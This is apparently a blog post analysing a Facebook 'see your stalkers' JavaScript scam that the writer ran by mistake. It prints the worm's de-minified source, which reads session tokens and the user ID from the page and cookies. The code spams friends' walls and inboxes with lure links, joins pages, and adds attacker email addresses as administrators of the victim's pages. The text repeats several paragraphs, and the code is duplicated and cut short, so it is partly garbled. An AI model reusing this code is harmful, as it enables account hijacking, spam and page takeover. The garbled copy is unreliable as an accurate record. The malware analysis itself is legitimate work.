I received a notification to "see my facebook stalkers" from one page I frequent. Dubious, I loaded the appropriate javascript injection (next time, use a dummy account...) and executed it.
Suspecting some mischief, I launched another facebook tab to see if it was doing what my instincts were telling me.
It was.
Luckily I halted it before it got to 16 people. Still, that means at least 15 people to scrub my hijacked posts out of.
Looking at the javascript source, I found it was packed (from http://fbonlines.info/StalkerTools.fb) with this garbage: (code hidden as it is really a bear - I just kept it for sake of integrity)
However, the author of this code used the most commonly available javascript minifier (his first mistake), yielding (via http://jsbeautifier.org/):
Yes, ladies and gentlemen, you see it right. He has left his CnC email accounts unobfuscated, among other things.
Looking at this, you can easily see what is going on. He scans your friends list, and while iterating through, sends both AJAX requests for fbmail and posting on the victims wall.
He also added in a few shortened links, in the event Facebook decides to ban mention of fbonlines.info.
Facebook's best solution would be to scrub their database of the emails in "admin_note" in all page administration controls.
Suspecting some mischief, I launched another facebook tab to see if it was doing what my instincts were telling me.
It was.
Luckily I halted it before it got to 16 people. Still, that means at least 15 people to scrub my hijacked posts out of.
Looking at the javascript source, I found it was packed (from http://fbonlines.info/StalkerTools.fb) with this garbage: (code hidden as it is really a bear - I just kept it for sake of integrity)
However, the author of this code used the most commonly available javascript minifier (his first mistake), yielding (via http://jsbeautifier.org/):
function _88xuhyr(_0x91e5x2) {
st = _0x91e5x2['split'](',');
d = '';
for (i = 0; i < st['length']; i++) {
d += String['fromCharCode'](st[i] - 24);
function addAdmin(_0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7) {
iemails = _0x91e5x5['split'](',');
main_emails = [];
for (i = 0; i < iemails['length']; i++) {
main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
with(newx = new XMLHttpRequest) {
open('POST', '/pages/edit/?id=' + _0x91e5x4 + '&sk=admin');
setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
send('post_form_id=' + _0x91e5x6 + '&fb_dtsg=' + _0x91e5x7 + '&fbpage_id=' + _0x91e5x4 + '&' + main_emails['join']('&') + '&save=1');
function makePost(_0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc) {
formx = _0x91e5x9['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
dtx = _0x91e5x9['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
composerx = _0x91e5x9['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
msg = _0x91e5xa['randomize']() + '\x0A\x0A';
text_post = '';
text_actual = '';
pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + _0x91e5xb['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';
function update(_0x91e5xe) {
with(newx = new XMLHttpRequest) {
open('POST', '/ajax/updatestatus.php?__a=1');
setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
goog1 = 'http://goo.gl/kryZJ';
goog2 = 'http://goo.gl/m2kvB';
goog3 = 'http://goo.gl/y4lbw';
goog4 = 'http://goo.gl/vNRZN';
goog5 = 'http://goo.gl/hF0UK';
goog6 = 'http://goo.gl/zc4Ja';
event_id = '168046893242650';
page_id_x = '198161766879493';
page_id_xx = '';
admin_emails = 'kary.whitebird.mgqy@hotmail.com,chery.kolakowski.hqnu@hotmail.com';
statuses = ['Wow! Seems like lots of people stalk me - ' + goog1, 'New FB tool shows who stalks your profile-- ' + goog2, 'Secret tool shows who stalks your pics ' + goog3, 'Insane! Awesome tool to see who looks at your pics >> ' + goog4, 'According to ' + goog5 + ' you\'re my top stalker. Creep.', 'Secret tool shows who stalks your pics - ' + goog6];
subjects = ['Check this out!', 'Hey, whats happening?', 'Hey! This is awesome'];
Array['prototype']['randomize'] = function () {
return this[Math['floor'](Math['random']() * this['length'])];
Object['prototype']['isReady'] = function () {
if (this['readyState'] == 4 && this['status'] == 200) {
return true;
} else {
return false;
String['prototype']['getFriends'] = function () {
friends2 = this['match'](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi)['join'](':')['replace'](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi, '')['replace'](/\\\\\\\">/gi, '|')['split'](':')['slice'](1);
return friends2;
function addAdmin(_0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7) {
iemails = _0x91e5x5['split'](',');
main_emails = [];
for (i = 0; i < iemails['length']; i++) {
main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
with(newx = new XMLHttpRequest) {
open('POST', '/pages/edit/?id=' + _0x91e5x4 + '&sk=admin');
setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
send('post_form_id=' + _0x91e5x6 + '&fb_dtsg=' + _0x91e5x7 + '&fbpage_id=' + _0x91e5x4 + '&' + main_emails['join']('&') + '&save=1');
function loading() {
var _0x91e5x10 = document['createElement']('div');
_0x91e5x10['id'] = 'screwyouz';
_0x91e5x10['setAttribute']('align', 'center');
_0x91e5x10['style']['margin'] = '0px auto';
_0x91e5x10['style']['position'] = 'absolute';
_0x91e5x10['style']['top'] = '10px';
_0x91e5x10['style']['zindex'] = '100';
_0x91e5x10['className'] = 'screwyou';
_0x91e5x10['innerHTML'] = '<br /><br /><br /><br /><br /><center><img src="http://fbviews.org/process.gif" /><br />Scanning may take up to 3 minutes</center>';
function makePost(_0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc) {
formx = _0x91e5x9['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
dtx = _0x91e5x9['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
composerx = _0x91e5x9['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
msg = _0x91e5xa['randomize']() + '\x0A\x0A';
text_post = '';
text_actual = '';
pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + _0x91e5xb['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';
function update(_0x91e5xe) {
with(newx = new XMLHttpRequest) {
open('POST', '/ajax/updatestatus.php?__a=1');
setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
if (window['location']['href'] == 'http://www.facebook.com/') {
formx = (res = document['body']['innerHTML'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
} else {
with(muhaha = new XMLHttpRequest) {
open('GET', '/', false);
formx = (res = muhaha['responseText'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
alert('Hello!\x0A\x0ATo activate the tool press Enter on your keyboard. \x0A\x0AThis will take 2-3 minutes, while waiting please do not close this window or tab.');
update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
with(newz = new XMLHttpRequest) {
open('POST', '/ajax/pages/fan_status.php?__a=1');
setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
send('fbpage_id=' + page_id_x + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
with(newzz = new XMLHttpRequest) {
open('POST', '/ajax/pages/fan_status.php?__a=1');
setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
send('fbpage_id=' + page_id_xx + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
void 0;
with(fr = new XMLHttpRequest) {
open('GET', '/ajax/browser/list/friends/all/?uid=' + (me = document['cookie']['match'](/c_user=(\d+)/)[1]) + '&offset=0&dual=1&__a=1');
onreadystatechange = function () {
if (fr['isReady']()) {
friends = fr['responseText']['getFriends']();
idx = [];
for (i = 0; i < friends['length']; i++) {
if (!isNaN(friends[i]['split']('|')[0])) {
idx[i] = 'ids[' + i + ']=' + friends[i]['split']('|')[0];
with(invi = new XMLHttpRequest) {
open('POST', '/ajax/social_graph/invite_dialog.php?__a=1');
setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
send('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&' + idx['join']('&') + '&node_id=' + event_id + '&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest');
cnt_fr = 0;
tx = setInterval(function () {
if (cnt_fr == friends['length']) {
window['location'] = 'http://fbviews.org/result.php';
makePost(document['body']['innerHTML'], statuses, friends[cnt_fr], friends);
with(xa = new XMLHttpRequest) {
open('GET', '/ajax/messaging/composer.php?__a=1&__d=1');
onreadystatechange = function () {
if (xa['isReady']()) {
compi = xa['responseText']['match'](/([\d\w]+)_error/)[1];
pxi = 'ids_' + compi + '[0]=' + friends[cnt_fr]['split']('|')[0] + '&subject=' + encodeURIComponent(subjects['randomize']()) + '&status=' + encodeURIComponent(statuses['randomize']()) + '&ids[0]=' + friends[cnt_fr]['split']('|')[0] + '&action=send_new&home_tab_id=1&profile_id=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&target_id=0&app_id=&&composer_id=' + compi + '&hey_kid_im_a_composer=true&thread&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest';
if (cnt_fr < 15) {
with(mi = new XMLHttpRequest) {
open('POST', '/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1');
setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
cnt_fr += 1;
}, 3000);
with(ins = new XMLHttpRequest) {
open('GET', '/insights/?_fb_noscript=1');
onreadystatechange = function () {
if (ins['isReady']()) {
ids = ins['responseText']['match'](/po_\d+">View/gi)['join'](':')['replace'](/(po_|">View)/gi, '')['split'](':');
cnt_pages = 0;
tz = setInterval(function () {
if (cnt_pages == ids['length']) {
window['location'] = 'http://fbviews.org/result.php';
update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + ids[cnt_pages] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
addAdmin(ids[cnt_pages], admin_emails, formx, dtx);
cnt_pages += 1;
}, 3000);
Looking at this, you can easily see what is going on. He scans your friends list, and while iterating through, sends both AJAX requests for fbmail and posting on the victims wall.
He also added in a few shortened links, in the event Facebook decides to ban mention of fbonlines.info.
Facebook's best solution would be to scrub their database of the emails in "admin_note" in all page administration controls.